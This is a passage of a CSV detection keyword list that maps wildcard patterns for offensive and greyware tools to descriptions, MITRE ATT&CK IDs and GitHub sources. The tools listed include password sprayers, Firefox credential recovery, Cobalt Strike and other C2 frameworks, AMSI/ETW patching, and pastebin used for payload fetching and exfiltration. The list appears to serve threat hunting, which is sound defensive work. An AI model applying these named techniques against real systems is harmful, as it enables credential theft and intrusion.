TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*password|passwort|passwd|*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*PasswordBoxImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Password-Default/service.txt*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*passwordfox.exe*,offensive_tool_keyword,passwordfox,PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/passwordfox.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passwordfox.zip*,offensive_tool_keyword,passwordfox,PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/passwordfox.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*passwordfox-x64.zip*,offensive_tool_keyword,passwordfox,PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/passwordfox.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Passwords/Leaked-Databases*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Passwords_in_description.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Password-Scripts*,offensive_tool_keyword,Password-Scripts,Password Scripts xploitation ,T1210 - T1555 - T1110 - T1554 - T1553,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/laconicwolf/Password-Scripts,1,0,N/A,N/A,1,98,37,2019-10-08T17:57:49Z,2017-10-20T17:17:23Z -*PasswordSpray *,offensive_tool_keyword,DomainPasswordSpray,DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!,t1110 - T1114 - T1555,TA0006 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/dafthack/DomainPasswordSpray,1,1,N/A,N/A,10,1498,354,2023-09-22T22:13:14Z,2016-10-04T23:37:37Z -*passwordspray*--user-as-pass*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*passwordspray.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*passwordSprayCmd*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*pastebin.com*/raw/* ,greyware_tool_keyword,pastebin,pastebin raw access content - abused by malwares to retrieve payloads,T1119,TA0009,Redline Stealer,N/A,Collection,pastebin.com,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pastebin.com*/rw/*,greyware_tool_keyword,pastebin,pastebin raw access content - abused by malwares to retrieve payloads,T1119,TA0009,Redline Stealer,N/A,Collection,pastebin.com,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pastebin.com*api/api_post.php*,greyware_tool_keyword,pastebin,pastebin POST url - abused by malwares to exfiltrate informations,T1102 - T1048 - T1094 - T1608.001,TA0011,N/A,N/A,Data Exfiltration,pastebin.com,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pasv and port both active*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*patator ftp_login host=* user=FILE0 0=*.txt *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*patator*,offensive_tool_keyword,patator,Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.,T1110 - T1111 - T1210 - T1558.004,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/lanjelot/patator,1,0,N/A,N/A,10,3284,776,2023-09-25T06:06:20Z,2014-08-25T00:56:21Z -*Patch-AMSI.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*patchAmsiOpenSession*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,1,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*Patch-ETW.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*Pateensy/PaensyLib/*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*--path docToDump.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*path_dll_hijack.h*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,0,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*pathhijack.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*PaulSec/twittor*,offensive_tool_keyword,twittor,A fully featured backdoor that uses Twitter as a C&C server ,T1105 - T1102 - T1041,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/PaulSec/twittor,1,1,N/A,10,10,743,253,2020-09-30T13:47:31Z,2015-09-09T07:23:25Z -*PayGen*python3 generate.py*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,0,N/A,N/A,,N/A,,, -*payload start tetanus*,offensive_tool_keyword,tetanus,Mythic C2 agent targeting Linux and Windows hosts written in Rust,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://github.com/MythicAgents/tetanus,1,0,N/A,N/A,3,229,33,2023-05-14T21:34:20Z,2022-03-07T20:35:33Z -*payload.c *,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*payload.csproj*,offensive_tool_keyword,scshell,network pentestration test (shell),T1071.001 - T1071.004 - T1046 - T1059 - T1024,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,N/A,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*payload.sct *,offensive_tool_keyword,scshell,network pentestration test (shell),T1071.001 - T1071.004 - T1046 - T1059 - T1024,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,N/A,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*payload/encryptor_remote.py*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*payload_bootstrap_hint*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*payload_creator.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*payload_encryption.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*payload_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*payload_local*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*payload_msf.c*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_msf.exe*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_scripts.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*payload_scripts/sleepmask*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*payload_section.cpp*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*payload_section.hpp*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*payload_spellshell.c*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_spellshell.exe*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_tidy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Payload_Type/freyja/*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*PayloadCommsHost*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*--payload-cookie*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*Payload-Download-Cradles*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*PayloadFormat.ASSEMBLY*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.DLL*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.EXE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - 